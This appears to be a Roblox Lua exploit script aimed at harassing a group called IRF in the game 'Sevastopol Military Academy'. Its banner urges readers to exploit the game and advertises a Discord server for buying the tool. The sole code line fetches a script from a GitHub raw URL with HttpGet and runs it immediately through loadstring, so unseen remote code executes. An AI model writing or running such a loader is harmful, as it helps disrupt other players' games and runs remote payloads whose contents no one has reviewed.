--------------------------------------------------------------------------------------
--[[
 __    ___  ___  ___  ___  ___   ___   ___  ____    ______     ______
|  |  /  / /  / /  / /  / /  /  /  /  /  / /    |  /__   /    /  ___/
|  | /  / /  / /  / /  /_/  /  /  /__/  / /     |    /  /    /  /_
|  |/  / /  / /  / /    __/   /  ___   / /  /|  |   /  /    /  __/  
|     / /  /_/  / /  /\  \   /  /  /  / /  /_|  |  /  /__  /  /__
|____/  \______/ /__/  \__\ /__/  /__/ /__/  |__| /_____/ /_____/
                   Very epic gui to fuck with IRF
                Make sure you exploit on this game!
https://www.roblox.com/games/603943201/Sevastopol-Military-Academy#!/game-instances

Join this discord if you wanna buy it: https://discord.gg/EKqyj2KU3x

]]--
--------------------------------------------------------------------------------------

loadstring(game:HttpGet("https://raw.githubusercontent.com/gigabeteu/IRF-FUCKER/main/main"))()
